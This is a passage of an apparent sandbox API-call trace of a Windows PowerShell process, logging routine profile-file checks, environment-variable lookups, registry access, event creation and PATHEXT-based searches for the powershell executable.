	[0303.146] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x26d860 | out: lpFileInformation=0x26d860*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0303.146] SetErrorMode (uMode=0x1) returned 0x1
	[0303.146] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x26d650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0303.146] SetErrorMode (uMode=0x1) returned 0x1
	[0303.146] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x26d860 | out: lpFileInformation=0x26d860*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0303.146] SetErrorMode (uMode=0x1) returned 0x1
	[0303.148] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0303.148] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.148] CoTaskMemFree (pv=0x5185a0) 
	[0303.149] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0303.149] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.149] CoTaskMemFree (pv=0x5185a0) 
	[0303.150] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0303.150] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.150] CoTaskMemFree (pv=0x5185a0) 
	[0303.152] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0303.152] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.152] CoTaskMemFree (pv=0x5185a0) 
	[0303.157] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0303.157] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.157] CoTaskMemFree (pv=0x5185a0) 
	[0304.324] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2e0
	[0304.324] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x398
	[0304.324] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x32c
	[0304.325] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x328
	[0304.325] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x39c
	[0304.325] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x304
	[0304.325] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x308
	[0304.325] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x31c
	[0304.325] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x330
	[0304.325] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x334
	[0304.325] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x338
	[0304.325] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x33c
	[0304.326] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0304.326] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0304.326] CoTaskMemFree (pv=0x5185a0) 
	[0304.327] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0304.328] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x26da40 | out: lpMode=0x26da40) returned 1
	[0304.329] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0304.329] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0304.329] CoTaskMemFree (pv=0x5185a0) 
	[0304.333] SetEvent (hEvent=0x328) returned 1
	[0304.333] SetEvent (hEvent=0x2e0) returned 1
	[0304.333] SetEvent (hEvent=0x398) returned 1
	[0304.333] SetEvent (hEvent=0x32c) returned 1
	[0304.333] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x340
	[0304.335] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0304.336] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0304.336] CoTaskMemFree (pv=0x5185a0) 
	[0304.337] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d798 | out: phkResult=0x26d798*=0x3a0) returned 0x0
	[0304.337] RegQueryValueExW (in: hKey=0x3a0, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x26d71c, lpData=0x0, lpcbData=0x26d718*=0x0 | out: lpType=0x26d71c*=0x0, lpData=0x0, lpcbData=0x26d718*=0x0) returned 0x2

Thread:
	id = 37
	os_tid = 0x574


Thread:
	id = 42
	os_tid = 0x578


Thread:
	id = 54
	os_tid = 0x788


Thread:
	id = 61
	os_tid = 0x988


Thread:
	id = 67
	os_tid = 0x8fc

	[0241.242] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0276.233] LocalFree (hMem=0x487290) returned 0x0
	[0276.233] CloseHandle (hObject=0x31c) returned 1
	[0276.233] CloseHandle (hObject=0x13) returned 1
	[0276.234] CloseHandle (hObject=0xf) returned 1
	[0276.234] RegCloseKey (hKey=0x308) returned 0x0
	[0276.234] RegCloseKey (hKey=0x304) returned 0x0
	[0276.235] RegCloseKey (hKey=0x300) returned 0x0
	[0276.235] LocalFree (hMem=0x487260) returned 0x0
	[0276.235] RegCloseKey (hKey=0x328) returned 0x0
	[0283.087] RegCloseKey (hKey=0x32c) returned 0x0
	[0292.614] RegCloseKey (hKey=0x38c) returned 0x0
	[0292.614] RegCloseKey (hKey=0x388) returned 0x0
	[0292.614] RegCloseKey (hKey=0x384) returned 0x0
	[0292.615] RegCloseKey (hKey=0x380) returned 0x0
	[0292.615] RegCloseKey (hKey=0x37c) returned 0x0
	[0292.615] RegCloseKey (hKey=0x378) returned 0x0
	[0292.615] RegCloseKey (hKey=0x374) returned 0x0
	[0292.616] RegCloseKey (hKey=0x34c) returned 0x0
	[0292.616] RegCloseKey (hKey=0x3a8) returned 0x0
	[0292.616] RegCloseKey (hKey=0x3a4) returned 0x0
	[0292.616] RegCloseKey (hKey=0x36c) returned 0x0
	[0292.617] RegCloseKey (hKey=0x368) returned 0x0
	[0292.617] RegCloseKey (hKey=0x364) returned 0x0
	[0292.617] RegCloseKey (hKey=0x360) returned 0x0
	[0292.617] RegCloseKey (hKey=0x35c) returned 0x0
	[0292.618] RegCloseKey (hKey=0x358) returned 0x0
	[0292.618] RegCloseKey (hKey=0x354) returned 0x0
	[0292.618] RegCloseKey (hKey=0x350) returned 0x0
	[0292.618] RegCloseKey (hKey=0x3a0) returned 0x0
	[0292.619] RegCloseKey (hKey=0x340) returned 0x0
	[0292.619] RegCloseKey (hKey=0x33c) returned 0x0
	[0292.619] RegCloseKey (hKey=0x338) returned 0x0
	[0292.619] RegCloseKey (hKey=0x334) returned 0x0
	[0292.620] RegCloseKey (hKey=0x330) returned 0x0
	[0292.620] RegCloseKey (hKey=0x31c) returned 0x0
	[0292.620] RegCloseKey (hKey=0x308) returned 0x0
	[0292.620] RegCloseKey (hKey=0x304) returned 0x0
	[0292.621] RegCloseKey (hKey=0x39c) returned 0x0
	[0292.621] RegCloseKey (hKey=0x328) returned 0x0
	[0292.621] RegCloseKey (hKey=0x32c) returned 0x0
	[0292.621] RegCloseKey (hKey=0x398) returned 0x0
	[0292.621] RegCloseKey (hKey=0x394) returned 0x0
	[0292.622] RegCloseKey (hKey=0x370) returned 0x0
	[0292.622] RegCloseKey (hKey=0x3ac) returned 0x0
	[0641.561] RegCloseKey (hKey=0x3a0) returned 0x0

Thread:
	id = 160
	os_tid = 0x9a0


Thread:
	id = 245
	os_tid = 0xd18

	[0305.312] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0305.316] SetThreadUILanguage (LangId=0x0) returned 0x7fffffa0409
	[0305.321] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0305.321] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.321] CoTaskMemFree (pv=0x5185a0) 
	[0305.322] VirtualQuery (in: lpAddress=0x1c9cdca0, lpBuffer=0x1c9ceb60, dwLength=0x30 | out: lpBuffer=0x1c9ceb60*(BaseAddress=0x1c9cd000, AllocationBase=0x1c040000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0305.325] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0305.325] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.326] CoTaskMemFree (pv=0x5185a0) 
	[0305.328] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0305.328] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.328] CoTaskMemFree (pv=0x5185a0) 
	[0305.331] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0305.331] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.332] CoTaskMemFree (pv=0x5185a0) 
	[0305.349] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0305.349] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.349] CoTaskMemFree (pv=0x5185a0) 
	[0305.351] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0305.351] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.351] CoTaskMemFree (pv=0x5185a0) 
	[0305.353] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0305.353] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.353] CoTaskMemFree (pv=0x5185a0) 
	[0306.262] VirtualQuery (in: lpAddress=0x1c9cdf50, lpBuffer=0x1c9cee10, dwLength=0x30 | out: lpBuffer=0x1c9cee10*(BaseAddress=0x1c9cd000, AllocationBase=0x1c040000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0306.263] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0306.263] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.263] CoTaskMemFree (pv=0x5185a0) 
	[0306.266] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0306.266] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.266] CoTaskMemFree (pv=0x5185a0) 
	[0306.266] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0306.266] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.266] CoTaskMemFree (pv=0x5185a0) 
	[0306.267] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0306.267] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.267] CoTaskMemFree (pv=0x5185a0) 
	[0306.272] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0306.272] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.272] CoTaskMemFree (pv=0x5185a0) 
	[0307.148] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0307.148] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.148] CoTaskMemFree (pv=0x5185a0) 
	[0307.150] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0307.150] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.150] CoTaskMemFree (pv=0x5185a0) 
	[0307.151] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0307.151] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.151] CoTaskMemFree (pv=0x5185a0) 
	[0307.153] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0307.153] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.153] CoTaskMemFree (pv=0x5185a0) 
	[0307.154] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0307.154] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.154] CoTaskMemFree (pv=0x5185a0) 
	[0307.155] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0307.155] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.155] CoTaskMemFree (pv=0x5185a0) 
	[0307.157] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0307.157] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.157] CoTaskMemFree (pv=0x5185a0) 
	[0307.172] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0307.172] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.172] CoTaskMemFree (pv=0x5185a0) 
	[0311.076] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0311.076] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0311.076] CoTaskMemFree (pv=0x5185a0) 
	[0312.208] CoTaskMemAlloc (cb=0x104) returned 0x5185a0
	[0312.208] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x5185a0, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0312.208] CoTaskMemFree (pv=0x5185a0) 
	[0312.208] CoTaskMemAlloc (cb=0x128) returned 0x478a60
	[0312.208] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x478a60, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0312.208] CoTaskMemFree (pv=0x478a60) 
	[0315.111] CoTaskMemAlloc (cb=0x20e) returned 0x1b8925e0
	[0315.111] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b8925e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0315.111] CoTaskMemFree (pv=0x1b8925e0) 
	[0315.726] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0315.727] SetErrorMode (uMode=0x1) returned 0x1
	[0315.730] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0323.478] SetErrorMode (uMode=0x1) returned 0x1
	[0323.871] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0323.871] SetErrorMode (uMode=0x1) returned 0x1
	[0323.871] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0323.879] SetErrorMode (uMode=0x1) returned 0x1
	[0323.880] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0323.880] SetErrorMode (uMode=0x1) returned 0x1
	[0323.880] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0323.887] SetErrorMode (uMode=0x1) returned 0x1
	[0323.888] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0323.888] SetErrorMode (uMode=0x1) returned 0x1
	[0323.888] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.509] SetErrorMode (uMode=0x1) returned 0x1
	[0324.510] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.510] SetErrorMode (uMode=0x1) returned 0x1
	[0324.510] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.518] SetErrorMode (uMode=0x1) returned 0x1
	[0324.520] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.520] SetErrorMode (uMode=0x1) returned 0x1
	[0324.520] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.528] SetErrorMode (uMode=0x1) returned 0x1
	[0324.530] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.530] SetErrorMode (uMode=0x1) returned 0x1
	[0324.530] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.538] SetErrorMode (uMode=0x1) returned 0x1
	[0324.539] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.540] SetErrorMode (uMode=0x1) returned 0x1
	[0324.540] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.391] SetErrorMode (uMode=0x1) returned 0x1
	[0325.392] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.392] SetErrorMode (uMode=0x1) returned 0x1
	[0325.393] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.401] SetErrorMode (uMode=0x1) returned 0x1
	[0325.402] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.403] SetErrorMode (uMode=0x1) returned 0x1
	[0325.403] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.411] SetErrorMode (uMode=0x1) returned 0x1
	[0325.413] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.413] SetErrorMode (uMode=0x1) returned 0x1
